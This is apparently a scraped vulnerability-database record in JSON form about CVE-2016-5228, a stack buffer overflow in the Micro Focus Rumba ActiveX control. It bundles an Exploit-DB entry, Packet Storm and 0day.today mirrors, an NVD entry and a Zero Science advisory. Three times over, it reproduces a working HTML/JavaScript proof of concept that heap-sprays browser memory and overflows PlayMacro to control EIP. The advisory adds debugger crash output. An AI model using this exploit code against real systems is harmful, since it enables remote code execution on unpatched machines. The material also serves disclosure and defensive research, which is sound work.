{"id": "EDB-ID:40649", "hash": "14e734b8ec7f3f88b6ca6bec986d281b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow", "description": "Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow. CVE-2016-5228. Dos exploit for Windows platform", "published": "2016-10-31T00:00:00", "modified": "2016-10-31T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "https://www.exploit-db.com/exploits/40649/", "reporter": "Umit Aksu", "references": [], "cvelist": ["CVE-2016-5228"], "lastseen": "2016-10-31T17:29:26", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 8.2, "vector": "NONE", "modified": "2016-10-31T17:29:26"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-5228"]}, {"type": "zdt", "idList": ["1337DAY-ID-26171"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139432"]}, {"type": "zeroscience", "idList": ["ZSL-2016-5327"]}], "modified": "2016-10-31T17:29:26"}, "vulnersScore": 8.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/40649/", "sourceData": "# Exploit Title: Micro Focus Rumba <= 9.3 ActiveX Stack-based buffer overflow\r\n# Date: 29-10-2016\r\n# Exploit Author: Umit Aksu\r\n# Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28600.micro-focus-rumba-9-x-security-update.aspx\r\n# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40231\r\n# Version: <= 9.3\r\n# Tested on: Internet Explorer 11 on windows 7\r\n# CVE : CVE-2016-5228\r\n \r\n\r\n\r\n1. Description\r\nStack-based buffer overflow in the PlayMacro function in ObjectXMacro.ObjectXMacro in WdMacCtl.ocx in Micro Focus Rumba 9.x before 9.3 HF 11997 and 9.4.x before 9.4 HF 12815 allows remote attackers to execute arbitrary code via a long MacroName argument.\r\n\r\n\r\n2. Proof of Concept\r\n\r\nThe code below sprays the memory to have a valid memory address which can then be used to reference... the exploit code only makes it possible to overwrite the EIP the rest is up to you. \r\n\r\n\r\n\r\n\r\n<html>\r\n<head>\r\n <object classid='clsid:56359FC0-E847-11CE-BE79-02608C8F68F1' id='_vulActiveX'>\r\n </object> \r\n</head>\r\n<body>\r\n<div id=\"blah\"></div>\r\n\r\n<script language=\"javascript\">\r\n\r\nfunction vuln(){\r\n// 272 Junk Data \r\n// 272 + \"\\x43\\x43\\x43\\x43\" = EDX = 43434343\r\n// \r\n\r\n// If we change the edx to an address that point to a valid address \r\n// We will have control over EIP \r\n// 0x20302228\r\n\r\n\r\n// Overwrite the stack \r\nvar evil_payload = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\";\r\n// Addres pointing to our sprayed heap\r\nvar EDX = \"\\x28\\x22\\x30\\x20\";\r\n\r\nevil_payload += EDX;\r\n\r\n_vulActiveX.PlayMacro(evil_payload);\r\n \r\n }\r\n\r\n\r\n\r\n// This create blocks of memory with data we control\r\n// And attaches the data to a button.title\r\n// By doing this we have a predicatable place in memory containing our data\r\n// This data can by used to place shellcode in it and can be used like in this case to\r\n// point to valid address to overwrite EIP\r\n\r\n\r\n// Heap Spraying technique of corelanc0d3r \r\n// See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/\r\n\r\nvar div_container = document.getElementById(\"blah\");\r\ndiv_container.style.cssText = \"display:none\";\r\nvar data;\r\noffset = 0x104;\r\nvar jmp_address=\"\\x28\\x22\\x30\\x20\"; \r\n\r\njunk = unescape(\"%u4747%u4747\"); // <-------- EIP Value\r\nwhile(junk.length < 0x1000) junk += junk;\r\n\r\n\r\n// 20302290\r\nshellcode = unescape(\"%u2290%u2030%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444\");\r\ndata = junk.substring(0,offset) + shellcode;\r\ndata += junk.substring(0,0x800 - offset - shellcode.length);\r\nwhile(data.length < 0x80000) data += data\r\n// Targets:\r\n// FireFox: 0x20302210\r\n// IE 8, 9 and 10/11: 0x20302228\r\nfor(var i = 0; i < 0x500; i++)\r\n{\r\nvar obj = document.createElement(\"button\");\r\nobj.title = data.substring(0,0x40000-0x58);\r\ndiv_container.appendChild(obj);\r\n}\r\n\r\n\r\n</script>\r\n\r\n\r\n<input type=\"button\" onclick=\"javascript:vuln()\" value=\"exploit\" >\r\n\r\n</body>\r\n\r\n\r\n\r\n</html>\r\n\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:15:37", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the PlayMacro function in ObjectXMacro.ObjectXMacro in WdMacCtl.ocx in Micro Focus Rumba 9.x before 9.3 HF 11997 and 9.4.x before 9.4 HF 12815 allows remote attackers to execute arbitrary code via a long MacroName argument. NOTE: some references mention CVE-2016-5226 but that is not a correct ID for any Rumba vulnerability.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-5228", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5228", "published": "2016-07-03T01:59:00", "title": "CVE-2016-5228", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:20", "bulletinFamily": "exploit", "description": "", "modified": "2016-10-31T00:00:00", "published": "2016-10-31T00:00:00", "href": "https://packetstormsecurity.com/files/139432/Micro-Focus-Rumba-9.3-Active-X-Stack-Buffer-Overflow.html", "id": "PACKETSTORM:139432", "type": "packetstorm", "title": "Micro Focus Rumba 9.3 Active-X Stack Buffer Overflow", "sourceData": "`# Exploit Title: Micro Focus Rumba <= 9.3 ActiveX Stack-based buffer overflow \n# Date: 29-10-2016 \n# Exploit Author: Umit Aksu \n# Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28600.micro-focus-rumba-9-x-security-update.aspx \n# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40231 \n# Version: <= 9.3 \n# Tested on: Internet Explorer 11 on windows 7 \n# CVE : CVE-2016-5228 \n \n \n \n1. Description \nStack-based buffer overflow in the PlayMacro function in ObjectXMacro.ObjectXMacro in WdMacCtl.ocx in Micro Focus Rumba 9.x before 9.3 HF 11997 and 9.4.x before 9.4 HF 12815 allows remote attackers to execute arbitrary code via a long MacroName argument. \n \n \n2. Proof of Concept \n \nThe code below sprays the memory to have a valid memory address which can then be used to reference... the exploit code only makes it possible to overwrite the EIP the rest is up to you. \n \n \n \n \n<html> \n<head> \n<object classid='clsid:56359FC0-E847-11CE-BE79-02608C8F68F1' id='_vulActiveX'> \n</object> \n</head> \n<body> \n<div id=\"blah\"></div> \n \n<script language=\"javascript\"> \n \nfunction vuln(){ \n// 272 Junk Data \n// 272 + \"\\x43\\x43\\x43\\x43\" = EDX = 43434343 \n// \n \n// If we change the edx to an address that point to a valid address \n// We will have control over EIP \n// 0x20302228 \n \n \n// Overwrite the stack \nvar evil_payload = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"; \n// Addres pointing to our sprayed heap \nvar EDX = \"\\x28\\x22\\x30\\x20\"; \n \nevil_payload += EDX; \n \n_vulActiveX.PlayMacro(evil_payload); \n \n} \n \n \n \n// This create blocks of memory with data we control \n// And attaches the data to a button.title \n// By doing this we have a predicatable place in memory containing our data \n// This data can by used to place shellcode in it and can be used like in this case to \n// point to valid address to overwrite EIP \n \n \n// Heap Spraying technique of corelanc0d3r \n// See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/ \n \nvar div_container = document.getElementById(\"blah\"); \ndiv_container.style.cssText = \"display:none\"; \nvar data; \noffset = 0x104; \nvar jmp_address=\"\\x28\\x22\\x30\\x20\"; \n \njunk = unescape(\"%u4747%u4747\"); // <-------- EIP Value \nwhile(junk.length < 0x1000) junk += junk; \n \n \n// 20302290 \nshellcode = unescape(\"%u2290%u2030%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444\"); \ndata = junk.substring(0,offset) + shellcode; \ndata += junk.substring(0,0x800 - offset - shellcode.length); \nwhile(data.length < 0x80000) data += data \n// Targets: \n// FireFox: 0x20302210 \n// IE 8, 9 and 10/11: 0x20302228 \nfor(var i = 0; i < 0x500; i++) \n{ \nvar obj = document.createElement(\"button\"); \nobj.title = data.substring(0,0x40000-0x58); \ndiv_container.appendChild(obj); \n} \n \n \n</script> \n \n \n<input type=\"button\" onclick=\"javascript:vuln()\" value=\"exploit\" > \n \n</body> \n \n \n \n</html> \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/139432/rumba93-overflow.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-04T15:02:51", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2016-10-31T00:00:00", "published": "2016-10-31T00:00:00", "href": "https://0day.today/exploit/description/26171", "id": "1337DAY-ID-26171", "title": "Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow", "type": "zdt", "sourceData": "# Exploit Title: Micro Focus Rumba <= 9.3 ActiveX Stack-based buffer overflow\r\n# Date: 29-10-2016\r\n# Exploit Author: Umit Aksu\r\n# Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28600.micro-focus-rumba-9-x-security-update.aspx\r\n# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40231\r\n# Version: <= 9.3\r\n# Tested on: Internet Explorer 11 on windows 7\r\n# CVE : CVE-2016-5228\r\n \r\n \r\n \r\n1. Description\r\nStack-based buffer overflow in the PlayMacro function in ObjectXMacro.ObjectXMacro in WdMacCtl.ocx in Micro Focus Rumba 9.x before 9.3 HF 11997 and 9.4.x before 9.4 HF 12815 allows remote attackers to execute arbitrary code via a long MacroName argument.\r\n \r\n \r\n2. Proof of Concept\r\n \r\nThe code below sprays the memory to have a valid memory address which can then be used to reference... the exploit code only makes it possible to overwrite the EIP the rest is up to you. \r\n \r\n \r\n \r\n \r\n<html>\r\n<head>\r\n <object classid='clsid:56359FC0-E847-11CE-BE79-02608C8F68F1' id='_vulActiveX'>\r\n </object> \r\n</head>\r\n<body>\r\n<div id=\"blah\"></div>\r\n \r\n<script language=\"javascript\">\r\n \r\nfunction vuln(){\r\n// 272 Junk Data \r\n// 272 + \"\\x43\\x43\\x43\\x43\" = EDX = 43434343\r\n// \r\n \r\n// If we change the edx to an address that point to a valid address \r\n// We will have control over EIP \r\n// 0x20302228\r\n \r\n \r\n// Overwrite the stack \r\nvar evil_payload = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\";\r\n// Addres pointing to our sprayed heap\r\nvar EDX = \"\\x28\\x22\\x30\\x20\";\r\n \r\nevil_payload += EDX;\r\n \r\n_vulActiveX.PlayMacro(evil_payload);\r\n \r\n }\r\n \r\n \r\n \r\n// This create blocks of memory with data we control\r\n// And attaches the data to a button.title\r\n// By doing this we have a predicatable place in memory containing our data\r\n// This data can by used to place shellcode in it and can be used like in this case to\r\n// point to valid address to overwrite EIP\r\n \r\n \r\n// Heap Spraying technique of corelanc0d3r \r\n// See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/\r\n \r\nvar div_container = document.getElementById(\"blah\");\r\ndiv_container.style.cssText = \"display:none\";\r\nvar data;\r\noffset = 0x104;\r\nvar jmp_address=\"\\x28\\x22\\x30\\x20\"; \r\n \r\njunk = unescape(\"%u4747%u4747\"); // <-------- EIP Value\r\nwhile(junk.length < 0x1000) junk += junk;\r\n \r\n \r\n// 20302290\r\nshellcode = unescape(\"%u2290%u2030%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444\");\r\ndata = junk.substring(0,offset) + shellcode;\r\ndata += junk.substring(0,0x800 - offset - shellcode.length);\r\nwhile(data.length < 0x80000) data += data\r\n// Targets:\r\n// FireFox: 0x20302210\r\n// IE 8, 9 and 10/11: 0x20302228\r\nfor(var i = 0; i < 0x500; i++)\r\n{\r\nvar obj = document.createElement(\"button\");\r\nobj.title = data.substring(0,0x40000-0x58);\r\ndiv_container.appendChild(obj);\r\n}\r\n \r\n \r\n</script>\r\n \r\n \r\n<input type=\"button\" onclick=\"javascript:vuln()\" value=\"exploit\" >\r\n \r\n</body>\r\n \r\n \r\n \r\n</html>\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26171"}], "zeroscience": [{"lastseen": "2019-11-11T16:11:04", "bulletinFamily": "exploit", "description": "Title: Micro Focus Rumba+ v9.4 Multiple Stack Buffer Overflow Vulnerabilities \nAdvisory ID: [ZSL-2016-5327](<ZSL-2016-5327.php>) \nType: Local/Remote \nImpact: System Access, DoS \nRisk: (4/5) \nRelease Date: 26.05.2016 \n\n\n##### Summary\n\nRumba is a terminal emulation solution with UI (User Interface) modernization properties. Rumba and Rumba+ allows users to connect to so-called 'legacy systems' (typically a mainframe) via desktop, web and mobile. \n\n##### Description\n\nRumba+ software package suffers from multiple stack buffer overflow vulnerabilities when parsing large amount of bytes to several functions in several OLE controls. An attacker can gain access to the system of the affected node and execute arbitrary code. \n \n\\-------------------------------------------------------------------------------- \n \n` (1d78.52c): Access violation - code c0000005 (!!! second chance !!!) \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Windows\\SysWOW64\\ntdll.dll - \neax=00000000 ebx=45454545 ecx=74d72a9c edx=42424242 esi=0032ddc0 edi=00000000 \neip=770a15fe esp=0032dd58 ebp=0032ddac iopl=0 nv up ei pl zr na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 \nntdll!NtRaiseException+0x12: \n770a15fe 83c404 add esp,4 \n0:000> !exchain \n0032e7cc: 45454545 \nInvalid exception stack at 44444444 \n0:000> d 0032e7cc \n0032e7cc 44 44 44 44 45 45 45 45-43 43 43 43 43 43 43 43 DDDDEEEECCCCCCCC \n0032e7dc 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC \n0032e7ec 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC \n0032e7fc 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC \n0032e80c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC \n0032e81c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC \n0032e82c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC \n0032e83c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC \n0:000> kb \nChildEBP RetAddr Args to Child \nWARNING: Stack unwind information not available. Following frames may be wrong. \n0032ddac 77147415 0032ddc0 0032de10 00000000 ntdll!NtRaiseException+0x12 \n0032e0e0 7711071a 45454545 fffffffe fffffffe ntdll!RtlRemoteCall+0x236 \n0032e130 770db3f5 45454545 0000004d 0032e82c ntdll!RtlUlonglongByteSwap+0x1327a \n0032e1b0 77090133 0032e1c8 0032e218 0032e1c8 ntdll!LdrRemoveLoadAsDataTable+0xcac \n0032e7b0 41414141 42424242 43434343 43434343 ntdll!KiUserExceptionDispatcher+0xf \n0032e7b4 42424242 43434343 43434343 43434343 0x41414141 \n0032e7b8 43434343 43434343 43434343 43434343 0x42424242 \n0032e7bc 43434343 43434343 43434343 44444444 0x43434343 \n0032e7c0 43434343 43434343 44444444 45454545 0x43434343 \n0032e7c4 43434343 44444444 45454545 43434343 0x43434343 \n0032e7c8 44444444 45454545 43434343 43434343 0x43434343 \n0032e7cc 45454545 43434343 43434343 43434343 0x44444444 \n0032e7d0 43434343 43434343 43434343 43434343 0x45454545 \n0032e7d4 43434343 43434343 43434343 43434343 0x43434343 \n0032e7d8 43434343 43434343 43434343 43434343 0x43434343 \n0032e7dc 43434343 43434343 43434343 43434343 0x43434343 \n` \n\\-------------------------------------------------------------------------------- \n \n\n\n##### Vendor\n\nMicro Focus - <https://www.microfocus.com>\n\n##### Affected Version\n\n9.4.4058.0 and 9.4.0 SP0 Patch0 \n\n##### Tested On\n\nMicrosoft Windows 7 Ultimate SP1 (EN) \nMicrosoft Windows 7 Professional SP1 (EN) \nMicrosoft Windows 7 Enterprise SP1 (EN) \n\n##### Vendor Status\n\n[03.02.2016] Vulnerability discovered. \n[13.02.2016] Vendor contacted. \n[25.05.2016] No response from the vendor. \n[26.05.2016] Public security advisory released. \n[30.06.2016] Vendor releases Rumba 9.4 (HF 13960), Rumba 9.4 (HF 12815) and 9.3 (HF 11997) to address these issues. \n\n##### PoC\n\n[rumba_bof.txt](<../../codes/rumba_bof.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - &lt;[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)&gt;\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/39857/> \n[2] <https://cxsecurity.com/issue/WLB-2016050136> \n[3] <https://packetstormsecurity.com/files/137205> \n[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/113527> \n[5] <http://www.vfocus.net/art/20160530/12710.html> \n[6] [http://microfocus.com/mainframe_solutions/rumba/w/kb/28601.rumba-9-4-stack-bof-vuln.aspx](<http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28601.rumba-9-4-stack-buffer-overflow-vulnerabilities.aspx>) \n[7] [http://microfocus.com/mainframe_solutions/rumba/w/kb/28600.mf-rumba-9-x-sec-update.aspx](<http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28600.micro-focus-rumba-9-x-security-update.aspx>) \n[8] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1606> \n[9] <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1606> \n[10] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5228> \n[11] <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5228> \n[12] <http://www.securiteam.com/securitynews/5NP3I00J6U.html> \n[13] <https://www.us-cert.gov/ncas/bulletins/SB16-193> \n[14] <http://www.securityfocus.com/bid/91559>\n\n##### Changelog\n\n[26.05.2016] - Initial release \n[27.05.2016] - Added reference [2] \n[28.05.2016] - Added reference [3] and [4] \n[14.06.2016] - Added reference [5] \n[30.06.2016] - Added vendor status and reference [6], [7], [8], [9], [10] and [11] \n[25.07.2016] - Added reference [12], [13] and [14] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2016-05-26T00:00:00", "published": "2016-05-26T00:00:00", "id": "ZSL-2016-5327", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5327.php", "title": "Micro Focus Rumba+ v9.4 Multiple Stack Buffer Overflow Vulnerabilities", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n<!--\nbody {\n\tbackground-color: #000;\n}\nbody,td,th {\n\tfont-family: Verdana, Geneva, sans-serif;\n}\na:link {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:visited {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:hover {\n\ttext-decoration: underline;\n\tcolor: #666;\n}\na:active {\n\ttext-decoration: none;\n}\n-->\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/rumba_bof.txt"}]}